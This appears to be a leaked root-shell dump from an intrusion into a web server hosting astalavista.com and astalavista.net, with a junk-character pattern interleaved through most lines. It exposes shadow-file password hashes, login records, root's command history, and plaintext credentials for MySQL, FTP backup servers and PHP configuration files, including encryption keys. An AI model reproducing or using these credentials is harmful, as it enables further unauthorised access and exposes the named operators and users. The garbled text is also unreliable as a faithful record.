. x* k! W0 S8 d) @! `: f/ ojon1$5yHxRLX.$8pZs0cQLNh5uFCK3m4st1.:13777:0:99999:7:::
) ]3 J& [& k5 ^/ mcom1$jEZ62nri$aDTj.1REsrYePcPBdfOQz1:13780:0:99999:7:::
, K2 M( J6 ?( lastanet1$YniJLAr.$NKtPNNGK9mcmz3/mLMSWC1:14235:0:99999:7:::
7 `6 [4 t: {" D- A- o' F% r9 o, b+ G c% |" Z. `3 K0 V4 ~
sh-3.2# cat /etc/motd
4 g7 X: t# \+ g" T3 L1 P7 E/ y5 C#####################################################3 u. R9 ?) M$ @
#____ ____ ___ ____ _ ____ _ _ _ ____ ___ ____ #
# {5 j: |& {3 d X# H- V0 t# |__| [__ | |__| | |__| | | | [__ | |__| #
: r* ]1 r7 d! I9 f% q3 d0 ` A# | | ___] | | | |___ | | \/ | ___] | | | #) l+ q u% T1 v) y4 a9 P' o
# #
- T7 c$ j3 F8 J- k3 e1 H" y#####################################################
. y% k7 s& v+ R' A5 w. F# #$ O' K+ s9 H9 V/ P4 S$ g
# Admin Contact - 链接标记support@secureservertech.com #* b( k) U4 r& l# M
# #
# t( _2 E2 r- N5 L! F! a$ |3 T- R# Available ShortCuts #3 N1 C% g: a7 O( o* X* B* d
# #/ h# t$ |* a$ p4 ]
# nst - list active connections #6 \, H2 F5 c3 r. n( j* K m) [
# ddos - shows how many times each ip is connected #3 t$ f* S1 g" T/ J& q1 _
# ltr - restart the webserver #. c& P4 v$ b- x. [. U; {& k2 e
# phpc - edit the php config file ## I# D6 H6 g' [ e7 I
# htc - edit the webserver configuration file #
+ Y' b( J$ J* _0 S9 X; m9 l" h# up - uptime #* }8 T0 K6 G0 U- v7 {) T
# etd - edit the motd of the day file #
2 {. {+ D8 l. y" u2 k# htr - start and restart apache if needed #, F3 M$ G; c9 U l
# syng - shows active SYN_RECV connections #
! j: u5 y. I' n6 Q. m" ~' y# synd - syn flood blocker - “synd -h” for usage #3 h$ j& [+ x. C; {' c
#####################################################; \- v+ k( a7 J- _
# NOTES: #0 b) K9 g# ?. ?
# Last Upgrade - 12-08-2008 by JF #
- A9 p/ q& E; L3 O$ A N# My.cnf/Mysql Optimization - 1-28-09 #0 o" i/ z/ s8 O' f
# #
, v( d+ i' @5 A4 w* l1 |5 t# #! j9 T1 ]. _+ e2 E+ h6 f- p
# #
2 R1 t3 p; y1 l- s6 Q##################################################### M% N; d2 ]7 ~( r
, l1 P! K& C/ e! W2 B
sh-3.2# lastlog | grep -v Never
, f7 q* x# z% _Username Port From Latest
6 y+ P8 m+ i3 k% n/ [root pts/1 adsl-194-162-fix Thu Jun 4 07:19:14 +0000 2009% A3 A+ d1 n: N( k
admin pts/1 cp.secureservert Thu Mar 20 10:25:39 +0000 2008
; p) a% b$ R9 O0 X4 i/ {" kcom pts/0 cust.static.212- Tue Jun 2 07:46:30 +0000 2009
$ X- f) G2 q; b, }astanet pts/0 adsl-194-162-fix Thu Apr 16 08:20:44 +0000 2009
% Z& V& p; J5 n ], S0 U
6 l( d1 j8 v' m/ s8 P# csh-3.2# ls -la
& V G: K3 F4 Etotal 453376/ c0 b7 {9 T! N' ~7 I
drwxr-x— 15 root root 4096 Jun 4 08:40 .1 i8 _# t; `$ T; k% N8 m. e
drwxr-xr-x 25 root root 4096 Jun 3 02:43 ..( X, p' W" M/ P: a
-rw-r–r– 1 root root 2394400 Oct 19 2007 10mbtest.zip
1 z: U& v t/ m8 Y" B T-rw——- 1 root root 1006 Sep 11 2007 anaconda-ks.cfg2 \5 k/ |& N- i/ m
-rw——- 1 root root 16836 Jun 4 07:21 .bash_history% P3 q1 ]+ m/ v5 |5 u2 ]/ d
-rw-r–r– 1 root root 24 Jan 6 2007 .bash_logout
4 k/ u# S, t( N4 a-rw-r–r– 1 root root 191 Jan 6 2007 .bash_profile
- E5 P( y0 }2 K+ C& N; L7 l-rw-r–r– 1 root root 176 Jan 6 2007 .bashrc* X7 k! E2 w/ h& Q! [* w
-rwx—— 1 root root 1899 Oct 28 2007 bk.sh9 {2 ]* s! W! t# l7 C* c, T
-rw-r–r– 1 root root 1327 Nov 29 2007 cert, {3 E& e5 F4 m( _% J
-rw-r–r– 1 root root 139860821 May 14 2008 contrexxbackup_20080514.sql- I* Z+ }" w$ L# O! c& a. w* Q2 p
drwxr-xr-x 4 root root 4096 May 20 2008 .cpan( `4 k! W% O# `0 c# Z9 {
-rw-r–r– 1 root root 100 Jan 6 2007 .cshrc
/ b& [) X) p, D-rw-r–r– 1 root root 323079 Mar 31 13:48 defaultp_ports.sql
0 y5 u5 C; \ I+ k# E) rdrwx—— 2 root root 4096 Oct 28 2007 .elinks
( f/ R8 ^- Y2 x; X! }2 @drwxr-xr-x 13 root root 4096 Mar 21 2008 gdb-6.7.1
3 @2 v" h% M& d" D' N-rw-r–r– 1 root root 15080950 Oct 29 2007 gdb-6.7.1.tar.bz2' e$ g# \% f" X
-rw——- 1 root root 0 Apr 16 13:19 .history
- N9 {* E7 b6 J8 w8 n3 Y% r-rw-r–r– 1 root root 16095 Sep 11 2007 install.log
3 u0 f! j1 x2 |& @0 }8 @9 _3 P1 A-rw-r–r– 1 root root 2566 Sep 11 2007 install.log.syslog" G0 w- o& y* q' k( \% Z% t3 V/ e$ q
-rw-r–r– 1 root root 1003 Jul 22 2007 install.sh
& o& C% h( H" z- \( p! F- ]' p-rw——- 1 root root 35 Jun 2 14:23 .lesshst
0 T% X7 m: N& X; s! X) @. ddrwxr-xr-x 2 root root 4096 Dec 29 2007 .lftp
0 n3 P$ ]8 j' V% y9 wdrwxr-xr-x 10 root root 4096 Sep 14 2007 linux-2.6.19.2-grsec+ O: p5 X7 d$ s5 R" ]- @0 Z
-rw-r–r– 1 root root 94979336 Feb 16 2007 linux-2.6.19.2-grsec.tar.gz$ P e- B/ y) l Z; [3 ?1 Y/ \% p
-rw-r–r– 1 root root 4737058 Sep 22 2007 linux-2.6.22.tar.bz2
( L5 v F! d* M' }-rwx—— 1 root root 760 Sep 18 2008 lp" S! n% a; o0 Y3 [
drwxr-xr-x 12 root root 4096 Nov 30 2007 lsws-3.3.13 j7 K& i) f* Y$ u u
-rw-r–r– 1 root root 2480045 Nov 30 2007 lsws-3.3.1-ent-x86_64-linux.tar.gz
/ l; y9 R! ~+ v* L0 l-rw-r–r– 1 root root 6388501 Nov 29 2007 lsws-3.3.1-ent-x86_64-linux.tar.gz.1
/ T. y/ C, N6 a! hdrwxr-xr-x 12 root root 4096 Mar 21 2008 lsws-3.3.9
' ^' Y# c8 v/ s0 \-rw-r–r– 1 root root 6437577 Mar 21 2008 lsws-3.3.9-ent-x86_64-linux.tar.gz
" D' c1 H: @) E' odrwxr-xr-x 12 root root 4096 May 29 15:10 lsws-4.0.3
& w! w# n) k& c" u1 }-rw-r–r– 1 root root 6496050 May 8 05:59 lsws-4.0.3-ent-x86_64-linux.tar.gz
6 U3 X: Q5 A6 b4 C* }3 Q-rw-r–r– 1 root root 25316 Feb 15 2006 mybk.sh$ ?1 K' O3 U! D S9 u7 A
-rw——- 1 root root 41 Oct 19 2007 .my.cnf
' t( f# Q4 k. a" U9 {* H: O- h$ {-rw——- 1 root root 2902 Jun 4 08:40 .mysql_history. D8 o& m5 F' }' y& g1 Y. f% e
-rwx—— 1 root root 38873 Apr 16 2008 mysqlreport2 H2 V [+ e- S" f9 c* m, e
-rw——- 1 root root 41 May 20 2008 .mytop
$ r6 H7 J$ p4 n6 v+ kdrwxr-xr-x 3 1000 1000 4096 May 20 2008 mytop-1.6
) ^9 a0 v- h y7 _ B-rw-r–r– 1 root root 19720 Feb 17 2007 mytop-1.6.tar.gz+ A! \) G3 J% D& l% b2 G& o
drwxr-xr-x 2 root root 4096 Oct 28 2007 .ncftp
2 e6 \ Z O4 }0 n) w+ W) ]& [* E-rw——- 1 root root 1462 Sep 21 2007 opt.php* o, A- i2 ^7 {# ]& k( @
-rw-r–r– 1 root root 3371 Sep 22 2007 p. D- P$ \, J2 Y. D
-rw-r–r– 1 root root 7608429 Aug 30 2007 php-5.2.4.tar.bz2! p2 G- s9 t3 G% z9 R# O+ k
-rw——- 1 root root 1024 Feb 3 21:32 .rnd
9 e! n/ f+ S* }-rw-r–r– 1 root root 716 Nov 28 2007 server.csr
+ P- t3 k) W' {-rw-r–r– 1 root root 887 Nov 28 2007 server.key
0 o" w# N! Z0 O4 g# ^# h: qdrwx—— 2 root root 4096 Oct 10 2008 .ssh
$ [: Y9 f# |+ E) }: Z-rw-r–r– 1 root root 44227 Oct 28 2007 tar-inc-backup.dat8 g/ v5 n' @4 K
-rw-r–r– 1 root root 129 Jan 6 2007 .tcshrc
5 k2 j! x# O8 @* P2 C* X j9 L-rw-r–r– 1 root root 104874307 Oct 17 2007 test100.zip) I6 j# y) m1 U# M+ {
-rw-r–r– 1 root root 67085540 Oct 19 2007 test100.zip.1. r% W8 t( |& N% @
drwxr-xr-x 2 root root 4096 Apr 29 11:15 tmp
2 W, ]8 x( v: `-rw-r–r– 1 root root 42596 May 21 2007 tuning-primer.sh
. b3 R7 e8 ` i) _' Edrwxrwxrwx 19 1000 users 4096 Mar 21 2008 valgrind-3.3.0+ Z2 y( k& L: y7 B1 L L
-rw-r–r– 1 root root 4519551 Dec 11 2007 valgrind-3.3.0.tar.bz25 d7 c( F* c4 v
-rw——- 1 root root 12997 May 16 2008 .viminfo
8 X) K' A. n. r0 v. X
+ S; |" |* A: S( n. hsh-3.2# cat .bash_history
# }3 x9 L( a3 }9 T3 ^3 V/ e[snip]% d0 a) \7 \4 C8 X; P9 F1 r5 B7 V
wget cp4sst.com/sstlinux.tar.gz
5 d" H( n$ k: Y9 p' y! |tar zxvf sstlinux.tar.gz! Z* y Z0 x% `0 n. F1 p, u* R
cd linux-2.6.27.10
, [! j* Y2 ?0 I: msh install.sh
0 O1 B# ^8 T" x0 V' k' _make bzImage ; make modules ; make modules_install ; make install0 I; \- Y0 f9 M/ P
make clean4 Y. P& V# o$ R; G/ N7 a
service mysqld restart
9 @* W0 [" `, d[snip]
: z4 V. \- r* t: Xcd /usr/sbin/1 }( B, c) ^: q/ }; Q/ W, j, t ]7 J
chmod 4777 traceroute. o+ z3 D" h" N, E5 A
chmod 4777 ping
% p3 T9 K2 T/ b7 m$ x* p/ [( Ftraceroute -I 链接标记[url]www.astalavista.ch[/url]7 Y- p: N) ~- H c2 o2 e: O0 r+ h* v
[snip]0 f, L6 j4 w0 g( w& [
vi /etc/csf/csf.conf' D9 o$ D* J7 L
traceroute google.ch
2 Y: l; j* L. X$ u7 g( R6 mservice csf restart
- Z& x0 o3 M S2 Z$ }tracert google.ch
f+ E# p6 W/ J- k" @1 q( q9 b- lservice csf restart
/ W- O( e) r: F8 otraceroute 链接标记[url]www.google.ch[/url]
* y! U/ T: I# f7 m. A& p atracert 链接标记[url]www.google.ch[/url]/ P( E# e1 Q4 T, a% o0 ^+ w j; Q
traceroute 链接标记[url]www.google.ch[/url]
. d2 y& r, s. _7 Y/ rlocate traceroute# k3 C, R, L, V) F& L2 H
chown 4755 /bin/traceroute
3 r: V6 `4 e0 ^/ D4 Y( ]; E) Cchown 4777 /bin/traceroute
# [" I. e5 g4 C1 Z( wlocate ping( l3 I3 z6 [% o- Z. n R3 e y
chown 4755 /bin/ping
6 Z9 t9 Q* x: i: w9 Z' wchown 4777 /bin/ping
* B, F {3 {4 B' G6 |# _7 Ucd /bin/( U* _% R& k6 x8 a. ?+ `
ls -ali | grep ping
. l c4 g. c+ T5 F- s- b' U* Fchown root ping& v$ H G$ d; c# n: g
chmod 4755 ping4 A( D& E, T" o
ls -ali | grep traceroute
5 \* Z& b- k% A* q* f3 Qchown root traceroute
9 d- s! O& [+ W. I- dchmod 4755 traceroute
7 E0 j/ ?2 O: r% ?# k" C# F( w3 bls -ali | grep traceroute1 z, e1 X% l) n4 s: T5 A
traceroute -I 链接标记[url]www.google.ch[/url]
# x1 n' r5 @+ M" C& d) W5 Ptraceroute 链接标记[url]www.google.ch[/url]
+ o, `- I0 G" Swhois pmsantos.ch
* J2 q0 q9 M/ D$ \1 u[snip]% y1 U/ p/ n! s" q7 ^
mysql -h com_contrexx2_live < /root/defaultp_ports.sql
7 n, L9 D4 r5 g) p/ g' y! ymysql -h -ucontrexxuser2 -p0fEYNZgXz1pKe com_contrexx2_live < /root/defaultp_ports.sql
4 Y+ W% m& F* N4 X4 p7 d% Cmysql -h -u contrexxuser2 -p com_contrexx2_live < /root/defaultp_ports.sql
& E% L& G+ T) q, X- ^" c) smysql -h localhost com_contrexx2_live < /root/defaultp_ports.sql, U% W. x4 K" K$ @' r$ H. y l
top
8 }: h C) Q9 o5 \/ I/ W* X* vping ssth.ch
2 s- b8 t. i5 s, q7 eping asdlkfaljgasd???ljg???lasj.ch
' K1 }9 R6 W' n' J9 W2 I% u" ?ping asdlkfaljgasdlasj.ch
* v# W5 r9 r$ ^- U, i6 ~9 p# _ping 链接标记[url]www.ssth.ch[/url]
- v3 C5 F' q" M" qping ssth.ch: \4 ?+ l L% X
nslookup 链接标记[url]www.google.ch[/url]/ A$ p' c5 K+ H- v/ v7 b0 T+ ~. C" N
nslookup 链接标记[url]www.ssth.ch[/url]
- Q9 k0 s- m, W! Z! \$ l$ \man nslookup
) `% N, q' |- D8 tping 链接标记[url]www.google.ch[/url]: P8 x. ?- ], |- c1 d
nslookup 链接标记[url]www.google.ch[/url]) j5 c' M' q F1 Z
nslookup 链接标记[url]www.google.ch[/url]5 P% [0 A4 \* c' x/ Z
nslookup salfjasdlf.ch1 X" r# F0 E; U/ ?2 Z- h
[snip]. H+ E* t9 f5 {4 t7 X- d' x
openssl passwd -1 sadf
' t( o& O J/ Q+ Z1 O) N" P/ Sopenssl passwd -1 5cZNHstdTy
6 j4 s7 d0 v) p% k3 p# `( bmysql0 `8 W% o& [! p8 H1 o7 m8 C/ N( Q
mysql9 W' M! F$ p, b) ^$ Z* Z" I; r7 i
locate proftp
. V& k2 h: ` j* Pvi /etc/proftpd.passwd1 U# c, [5 b& q
service proftpd restart6 R! p) g$ ]( _. n& m2 e
locate proftpd.conf
& D* O: z9 a% q. C# `8 I3 Avi /etc/proftpd.conf. \) T" U9 F4 u4 o, |) E, @
vi /etc/proftpd.passwd
' q8 f+ J# r$ ~: i. y+ Gservice proftpd restart2 }, t1 \( Q: ~3 {9 M) n6 l+ W9 Q
[snip]8 |8 K% n1 W0 G
/bin/sh /home/com/backup_system/backup.sh
M- F3 C; s% H! g$ p2 U1 V' X6 ~tar cfv /home/com/backups/09-04-28_backup.tar /home/com/public_html/admin
2 z- k! `: E5 V Fmysqldump -h localhost -u contrexxuser2 –password=0fEYNZgXz1pKe com_contrexx2_live > 09-04-29-com_contrexx2_live-full.sql5 ^' r5 f! J X: }3 T( Z
mysqldump -h localhost -u contrexxuser2 –password=0fEYNZgXz1pKe com_contrexx2 > 09-04-29-com_contrexx2-full.sql8 a( |4 C$ H9 W/ M, H# O
ls -ali) w$ X$ v1 d2 [, S; p0 ?* `
mysqldump -h localhost -u com_user1 –password=Undv7gu29gvb5ikhS com_contrexx > 07-04-29-com_contrexx-full.sql
( l. I: z4 N/ o1 Hmysqldump -h localhost -u com_user1 –password=Undv7gu29gvb5ikhS ideapool > 07-04-29-ideapool-full.sql) d& q. O! k3 j3 D: K6 B( `
crontab -l
! }2 k, y. {/ a u) Mcrontab -l$ O2 t7 `% ?/ Q. l9 y$ y
php -q /home/com/public_html/modifications/cronjobs/securitynews.php
4 q3 ^, f! |! p5 n2 }! u/home/com/public_html/modifications/cronjobs/exploits.sh) j7 c3 l2 L1 ]) M2 L
wget 链接标记[url]http://www.litespeedtech.com/pac ... x86_64-linux.tar.gz[/url]
; B( g7 t0 N4 N! G3 h! _tar zxvf lsws-4.0.3-ent-x86_64-linux.tar.gz
9 G- U8 [3 Q" o/ k( Bcd lsws-4.0.3
0 u& a1 f0 t, z( qsh install.sh# T4 t( Q& B4 Y' Z' z
uptime& Y% x4 H7 U$ Z9 ]6 C4 o! {) V- Z
hdparm -tt /dev/sda, G# \. M- D# \; v) N0 I; g+ n5 A
iostat5 ]. B+ h$ s/ ~/ V# v. T
yum install iostat
( c2 r: c2 R- Q3 e8 ?+ siostat
# \( ~. F% V. W# u* m+ `, C, nwhereis iostat+ S& i* e* X, `5 W
yjm clean all
1 r4 j( f1 T$ j, m; c; xyum clean all ; yum -y update9 M; d9 ~& d. \4 r7 i1 L9 m8 T9 E
iostat% |. z2 i# g3 F6 _. }( C
yum install systat
* T. H C: \5 R& `1 brpm -qa | grep iostat9 ~9 z. g* ? j Z, ^
rpm -qa | grep sysstat
* w0 \; ^# n/ ]+ Orpm -qa | grep systat
. i6 U b1 P0 z/ |% {dmesg -c
9 [7 F+ U2 m, L: {% y* R2 \9 gsysctl -p1 j# q: T, X+ h4 ~; h1 P0 b7 h% \
uname -r
! @" w" ^) W hcd /usr/src6 x6 @" m, `" {& P2 M, b. }
wget nix101.com/kernels/sstlinux.tar.gz7 }* L# L* S z
shutdown -r now
2 W4 M# L6 M( w R. ]! Dnano -w /boot/grub/grub.conf* E- |) O" m; K7 [
o6 W$ {4 J! S( ~/ csh-3.2# cat .my.cnf
, [; B, f8 H5 ~+ J ~* l1 o[client]
( j, H& D% _! _; o+ |8 g" Puser=da_admin4 U& A. b2 e% E- c4 w8 ~
password=X9dctmRH* V1 K! s4 u& |* ~- D. ?
' \* w; E9 w, g4 j$ Qsh-3.2# cat /home/com/backup_system/backup.sh6 P) T- f8 z" M. j3 L
#!/bin/sh
7 ?5 B" a. E, [#####################################################################
) O2 d9 ?7 U( J, w# #
3 o* F+ F6 y7 e& _0 ^! n" {( L# incremental backup for astalavista.com #
2 ~/ n E4 X# D% k* c. t9 M: d# #
% X) M5 |) g# a; @: M- a9 I# author: Paulo M. Santos <链接标记paulo.santos@astalavista.com> #9 Q% H. Z- N, l S- a& k& }
# #
6 C5 x( h: N2 f( a. `/ V0 a" X#####################################################################" b5 t9 S( c* T" g* }$ X4 ]# s% C
[snip]
+ j; l) t% S, j. O# e3 mPROG_DIR=”/home/com/backup_system”;
" }' n* y8 S* i, o- o- ABACKUP_DIR=”/home/com/backups”;
- Z9 G7 M: M6 Z' Z% `- F+ P) UDOBACKUP_FROM=”/home/com/domains/astalavista.com/public_html”;! v: y) v4 D z
# ftp for synology backup server
, _ h: o$ u. l7 U PFTP_HOST=”212.254.194.163″;7 T6 X; a$ z, {- W
FTP_PORT=”21″;6 n- Z) Y0 f0 _: B
FTP_USER=”astalavista.com”;! h+ n: u8 g$ G- Y( {
FTP_PASS=”yWHOJbzpWTWC6Xrmg1WnfBk5V”;
, a" i) e$ V! s5 n; cFTP_DIR=”/astalavista.com”;
B1 a/ @( }, P9 D* |# database: }# S# _5 ~1 Q
DB_HOST=”localhost”;0 k' r1 M3 @1 c# I* c' T4 z
DB_USER=”contrexxuser2″;2 t# _: {& k4 a3 k1 @
DB_PASS=”0fEYNZgXz1pKe”;
9 p" E- I( j- g8 dDB_DATABASE1=”com_contrexx2_live”;
" _& S" D/ t% XDB_DATABASE2=”com_contrexx2″;1 ~, A2 V" R/ b- _# z; I$ M
[snip]
6 W2 S$ I/ A: B K6 X: K9 hftp -in $FTP_HOST $FTP_PORT <<EOF
, K9 A& H/ q; g3 s) vquote USER $FTP_USER
2 M) W7 d( x6 z; R9 V+ Y3 zquote PASS $FTP_PASS
, k0 Y# I) b9 S' hcd $FTP_DIR
% _/ _9 c- m4 }+ }9 R( [" P2 |put $DB_FULLNAME-SQL_Dump.tar! ]0 T( Q- a- I, g. n2 Z6 `7 R* N w
put $BACKUP_FULLNAME-Public_HTML.tar2 D5 h5 R6 H# [
close
! R" q' w( {+ t \/ vbye
# Z( k2 }' l9 _/ g2 P7 ]- FEOF; ~% n$ z* y/ a
( T% E- a J! c, Ish-3.2# cd /home h7 p+ Z; ~* [2 c. X
sh-3.2# ls -la8 q$ e. Q. Y* r/ m; \
total 120
4 L6 z# M: @% L) N [7 k( Xdrwxr-xr-x 14 root root 4096 Mar 11 17:56 .
' D! K; u# z' m% a7 c5 p4 ~, gdrwxr-xr-x 25 root root 4096 Jun 3 02:43 ..
1 [% y& V9 i# Rdrwx–x–x 9 admin admin 4096 Nov 28 2007 admin
7 D: b' Z+ x$ ?% U# J E-rw——- 1 root root 8192 Jun 4 03:03 aquota.group3 k7 V& ]& u) a9 l, T& g
-rw——- 1 root root 8192 Jun 3 02:45 aquota.user& {8 K$ V4 Y1 V
drwx–x–x 6 astanet astanet 4096 Jun 4 09:51 astanet' k( P" X2 q6 l* l+ q
drwxr-xr-x 2 root root 4096 Jul 29 2008 backup" F2 h s. w& J' w0 s5 b* \
drwxr-xr-x 2 root root 4096 Sep 17 2008 backup.14161 k( }$ h% I! @5 K, O
drwx–x–x 10 com com 4096 Apr 28 12:40 com
o5 X/ g! O2 g* }) N, G) Z8 Pdrwxr-xr-x 2 root root 4096 May 17 2007 ftp
3 c3 r. N: h- ldrwx—— 3 jon jon 4096 Sep 21 2007 jon. w2 n3 W. b4 o% |5 U& Q) Q
drwx—— 2 root root 16384 Sep 11 2007 lost+found$ D9 M B/ Y; U/ w8 H4 M: U) z
drwxr-xr-x 2 root root 4096 Sep 14 2007 my. R# q0 Y4 r+ i3 c f" } `
drwxr-xr-x 5 mysql mysql 4096 Sep 24 2007 mysqldata
$ o8 O: |5 W* A: k# O# Y# I/ ]5 i+ Adrwx—— 2 jon jon 4096 Sep 15 2007 test
7 B& c0 X. I" Edrwxrwxrwt 2 root root 4096 Jul 29 2008 tmp+ U5 G9 [% P: y- d3 S" I. T3 J! f* r0 k
2 p8 x. `/ }9 J7 b
sh-3.2# cd admin
8 i# S' d4 V! z4 g5 `- @8 H8 b. rsh-3.2# ls -la
1 i4 P/ h8 a3 A# S, W) v: p8 ktotal 1735896
" \2 }8 I4 X) {; Z bdrwx–x–x 9 admin admin 4096 Nov 28 2007 .& M9 D' ~! {% O# X# n8 m
drwxr-xr-x 14 root root 4096 Mar 11 17:56 ..* w$ D& V* I4 B P4 ]! q
drwxrwxr-x 2 admin admin 4096 Oct 25 2007 admin_backups
& y3 |' _: k# r3 I; ydrwx—— 2 admin admin 4096 Sep 28 2007 backups
' }4 r5 L' S* y8 L4 L9 Y-rw——- 1 admin admin 860 Sep 17 2008 .bash_history R1 L6 W. c, A1 @5 D# [# L
-rw-r–r– 1 admin admin 24 Sep 14 2007 .bash_logout
9 h, g7 }9 L4 E4 U-rw-r–r– 1 admin admin 176 Sep 14 2007 .bash_profile/ J8 u3 j4 A* h+ r( F3 W
-rw-r–r– 1 admin admin 124 Sep 14 2007 .bashrc% ?: [( g* c% u0 I& c
drwxr-xr-x 2 root root 4096 Sep 28 2007 com_backups
9 |, G( ]" Q/ L; x. L" zdrwx–x–x 6 admin admin 4096 Sep 21 2007 domains5 }& V' X* X7 c' i) _
drwxrwx— 3 admin mail 4096 Sep 21 2007 imap, z* o9 f& p+ q" ?
-rw-r–r– 1 root root 24 Sep 21 2007 info.php! `$ L7 C3 I6 T$ m2 x) E9 m( D7 y
drwx—— 2 admin admin 4096 Sep 21 2007 mail
9 m* T- R- e. a2 V( K! Z* E4 d( ]1 U-rw-r–r– 1 root root 716 Nov 28 2007 server.csr
7 G. `/ z; a" p$ m$ o. h-rw-r–r– 1 root root 887 Nov 28 2007 server.key" S2 J/ v4 J6 A \+ S4 O( O+ Q
-rw-r—– 1 admin mail 34 Sep 14 2007 .shadow
5 M2 }" p( a p2 S7 g3 R-rw-r—– 1 admin com 1775711054 Oct 25 2007 user.admin.com.tar.gz
7 P2 X' i8 d/ Y5 G1 D5 S5 Sdrwx–x–x 2 admin admin 4096 Jul 29 2008 user_backups
: @, S, F& l1 _8 V
4 y3 B: U @; G% a8 psh-3.2# ..3 V, p9 g$ Z; n7 F- Y/ }0 ?" J0 ~
sh-3.2# cd jon+ b0 w2 ^% [# t: N6 G
sh-3.2# ls -la
' A: L' q- v7 i) Stotal 36
2 v2 f# D6 b7 H* a! S/ s" gdrwx—— 3 jon jon 4096 Sep 21 2007 .
' J7 ~ _1 ]2 A/ G8 cdrwxr-xr-x 14 root root 4096 Mar 11 17:56 ..
! R! o" I9 }( b2 D0 z3 p-rw——- 1 jon jon 53 Sep 21 2007 .bash_history
1 Q( z0 x7 q9 m" Q* T! G-rw-r–r– 1 jon jon 24 Sep 21 2007 .bash_logout
: i1 s1 |1 z7 J6 `7 {' E-rw-r–r– 1 jon jon 176 Sep 21 2007 .bash_profile
c( o+ h% Z2 u) V- i2 L-rw-r–r– 1 jon jon 124 Sep 21 2007 .bashrc
1 k, }) H2 h% c) X-rw-r–r– 1 root root 24 Sep 21 2007 info.php5 f/ S! B+ N1 m
drwxrwxr-x 2 jon jon 4096 Sep 21 2007 public_html
' L; v6 _6 V3 a- M4 ~1 z+ O" Y; j1 Y. ^# @ B
sh-3.2# cd ..) t8 T5 {6 g7 G0 _9 `
sh-3.2# cd test- M: I( q1 |5 V4 Y5 F5 W: a
sh-3.2# ls -la
; b3 E, i4 {" {: ^, }total 48
% U0 N' j7 w2 @2 n, Hdrwx—— 2 jon jon 4096 Sep 15 2007 .% {2 r! `) @" M( L
drwxr-xr-x 14 root root 4096 Mar 11 17:56 ..
# f" D4 E" C4 ?6 t+ M& d-rw——- 1 jon jon 79 Sep 21 2007 .bash_history
# O2 b, S) o1 k, i-rw-r–r– 1 jon jon 24 Sep 15 2007 .bash_logout
9 _+ o( K! Y& _' C7 E V-rw-r–r– 1 jon jon 176 Sep 15 2007 .bash_profile& K8 A# m# I: L: ^# ]
-rw-r–r– 1 jon jon 124 Sep 15 2007 .bashrc& Q. ?* Z) d- d w
sh-3.2# cat .bash_history, @6 T. q: A" Q: {
/usr/bin/mysqladmin -u root password PoliuJhytg67$ y- G" v6 F. ]+ J1 p {
7 A/ K8 [' C& }% ~/ |1 f! rsh-3.2# cd ..
* w: H) q8 \. o8 r5 Z- psh-3.2# cd astanet
0 d+ m! G; e# u Z9 ?sh-3.2# ls -la
" S' [- T9 N" R3 t' etotal 52
: v" G8 O: Q' L7 ^" l' X0 Kdrwx–x–x 6 astanet astanet 4096 Jun 4 09:51 .
# G. i% a |' c( c% J* Qdrwxr-xr-x 14 root root 4096 Mar 11 17:56 ..% n" r" v+ `! e6 U
drwxr-xr-x 2 root root 4096 Dec 23 16:00 auth0 S! y) c4 [5 r# v4 n
-rw——- 1 astanet astanet 3892 Apr 16 12:14 .bash_history
/ C' \0 R6 K- o-rw-r–r– 1 astanet astanet 33 Dec 17 21:50 .bash_logout+ I5 E' ^; n$ f$ s& a
-rw-r–r– 1 astanet astanet 176 Dec 17 21:50 .bash_profile
6 x2 Y- {0 y8 N* u-rw-r–r– 1 astanet astanet 124 Dec 17 21:50 .bashrc
0 ^) S1 p6 J* I8 L5 c2 Kdrwx–x–x 3 astanet astanet 4096 Dec 23 12:18 domains
! ?) w/ z! t/ X( k' Wdrwxrwx— 3 astanet mail 4096 Dec 23 12:18 imap
3 d. \2 {" ]) y# `+ h- fdrwx—— 2 astanet astanet 4096 Dec 23 12:18 mail
: [1 g9 P, m+ a! f-rw——- 1 astanet astanet 197 Jun 4 09:51 .mysql_history0 l7 X) V. T! n' m
lrwxrwxrwx 1 astanet astanet 37 Dec 23 12:18 public_html -> ./domains/astalavista.net/public_html
* D- ~6 U" y" G9 }-rw-r—– 1 astanet mail 34 Dec 22 12:41 .shadow
& D! r/ k" _; e/ y2 `- E. ~* q7 e: l) `
sh-3.2# cd auth/7 a2 d$ S/ e1 D1 ]8 P' q3 \
sh-3.2# ls -la
) a; {& f7 W% C& ^total 28% D! Q- b$ S3 ~6 d2 @ c( t" G
drwxr-xr-x 2 root root 4096 Dec 23 16:00 .
: w/ Z0 \) e! @' U7 a6 ]drwx–x–x 6 astanet astanet 4096 Jun 4 09:51 ../ i) g9 H6 e" N) ^2 V) p, I5 B9 U
-rw-r–r– 1 root root 321 Jan 5 2006 hackercontest.config.inc.php
3 s: J* E X) f) `+ }4 ^-rw-r–r– 1 root root 319 Jan 5 2006 hosting.config.inc.php
/ t7 Z8 O9 B$ i) h( e- i7 [-rw-r–r– 1 root root 24 Jun 4 09:38 .htadm_pwd
: O8 C7 Q. a% e' L6 f( N6 j-rw-r–r– 1 root root 49 Jan 5 2006 .htpasswd_newhosting
4 A* p J O* ?' k7 F-rw-r–r– 1 root root 51 Oct 11 2006 .htwebalizer_pwd
( F, Y: g4 P8 ?/ M/ o& a1 N) Q2 Z3 r: a
sh-3.2# cat hackercontest.config.inc.php5 m0 e$ K$ A/ V
<?PHP9 s( W" \7 b3 e: I
// Variabeln f?r Verbindung zur Datenbank //
- S+ J; U7 c. u" M9 P( _$conxHost = ‘localhost’; // MySQL hostname
( T3 n: k( ] z$ a$conxUser = ‘hackercontest’; // MySQL user! y% o" b) M' ~$ g
$conxPassword = ‘K6m@7dUc’; // MySQL password% c) y6 \7 P+ z: l& n# {
$bfkey = ‘cXvB3981′; // Encryption/Decryption Key for Blowfish
3 D4 ]( |7 e& R0 }1 g1 o& I2 |?>
: b" i' \+ D: l/ ]" lsh-3.2# cat hosting.config.inc.php# q' Z* a: v+ r
<?PHP7 P: V9 ^; u+ Y' D: x
// Variabeln f?r Verbindung zur Datenbank //# @. _: S' H! F2 T, V* k; t
$conxHost = ‘localhost’; // MySQL hostname" x: ^+ ?- T6 o$ Q" d- _ e
$conxUser = ‘hostinguser’; // MySQL user
3 F8 W& q$ z" l4 E$ Y Y$conxPassword = ‘cXvB3981′; // MySQL password
% k' _2 B2 S$ C5 g& O$bfkey = ‘cXvB3981′; // Encryption/Decryption Key for Blowfish
! D ^/ \' F# B' ]- u5 s?>
3 S# B* p5 h- B
